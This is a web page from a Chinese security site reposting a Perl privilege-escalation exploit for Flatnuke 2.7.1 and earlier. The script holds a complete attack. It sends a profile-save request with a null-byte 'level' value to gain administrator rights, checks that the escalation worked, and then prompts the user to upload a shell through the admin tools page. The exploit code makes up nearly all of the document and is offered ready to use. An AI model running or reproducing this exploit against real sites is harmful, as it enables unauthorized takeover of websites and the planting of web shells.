首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Flatnuke <= 2.7.1 (level) Remote Privilege Escalation Exploit
来源:staker[at]hotmail[dot]it 作者:yeat 发布时间:2009-04-14  

#!/usr/bin/env perl
#
# Flatnuke <= 2.7.1 (level) Privilege Escalation 0-day Exploit 
#
# Description
# -----------
# Flatnuke contains one flaw that may allow a user to become administrator.
# The issue is due to 'sections/none_Login/section.php' script not properly
# sanitizing user input supplied to the "level" POST variable. GPC = Off
# Change your rights using the null byte. Dork? Find it yourself.
# -----------
# by Juri Gianni aka yeat - staker[at]hotmail[dot]it
# thanks to #zeroidentity chan - http://zeroidentity.org
# Aquilo,mrdotkom,p3ri0d and the other members
#
# http://www.youtube.com/watch?v=fCRkJb8H2mQ italian
# http://www.youtube.com/watch?v=1U4KKuqdoRg english
#
# Usage/Example
# ------------- 
# perl flatnuke.pl host /path username secid
# perl flatnuke.pl localhost /flatnuke yeat 1ab8c9b8d33a4a4e1001d07af5565d22
# -------------

use LWP::UserAgent;
use IO::Socket;


our ($host,$path,$user,$secid) = @ARGV;

if (@ARGV != 4)  {
      print "Flatnuke <= 2.7.1 (level) Privilege Escalation 0-day Exploit\n";
      Usage::Exploit();
}
else {
    Flatnuke::Exploit();
}  


sub Flatnuke::Exploit()
{
        my ($ret,$lwp);
       
        $lwp = new LWP::UserAgent;
       
        $lwp->timeout(5);
        $lwp->agent('Links (2.1pre26; Linux 2.6.19-gentoo-r5 x86_64; x)');
        $lwp->default_header('Cookie' => "myforum=$user; path=$path; secid=$secid; path=$path;");
       
        $ret = $lwp->post("http://$host/$path/index.php?mod=none_Login",
                          [
                            action     => 'saveprofile',
                            user       => $user,
                            hiddenmail => 'on',
                            ava        => 'blank.png',
                            level      => "\x0010",
                          ]); 
       
        if ($ret->is_success) {
           Flatnuke::Rights();
        }  
}


sub Flatnuke::Rights()
{
       my $packet;
       my $result;
       my $socket = new IO::Socket::INET(
                                          PeerAddr => $host,
                                          PeerPort => 80,
                                          Proto    => 'tcp',
                                        ) or die $!;
                                         
       $packet .= "GET /$path/index.php?mod=none_Admin HTTP/1.1\r\n";
       $packet .= "Host: $host\r\n";
       $packet .= "User-Agent: Lynx (textmode)\r\n";
       $packet .= "Referer: http://$host/$path/index.php?mod=none_Admin\r\n";
       $packet .= "Cookie: myforum=$user; path=$path; secid=$secid; path=$path;\r\n";
       $packet .= "Connection: close\r\n\r\n";
    
       $socket->send($packet);
    
       while (<$socket>) {
          $result .= $_;
       }
    
       if ($result =~ /(livello|nivel|level|niveau) 10/i) {   
         print "Exploit successful..you're admin\n";
         print "Upload a shell on: sections/none_Admin/none_tools/webadmin.php\n";
       }
       else {
         print "Exploit unsuccesful..\n";
       }   
}


sub Usage::Exploit()
{
        print "Usage: perl $0 host/path username secid\n";
        print "RunEx: perl localhost /flatnuke yeat c3e557f271a86f893e02971b38b51653\n";
        print "by staker[at]hotmail[dot]it\n";
        exit;
}       


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·ftpdmin 0.96 RNFR Remote Buffe
·FreeBSD i386/AMD64 Execve /bin
·HTML Email Creator <= 2.1b668
·PHP 5.2.9 curl safe_mode and o
·Mini-stream Ripper (.M3U File)
·w3bcms Gaestebuch 3.0.0 Blind
·WM Downloader (.M3U File) Loca
·Chance-i DiViS-Web DVR System
·Mini-stream RM-MP3 Converter (
·Xilisoft Video Converter Wizar
·OpenBSD 4.3/4.4/4.5 (IP datagr
·The IBM BladeCenter Advanced M
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved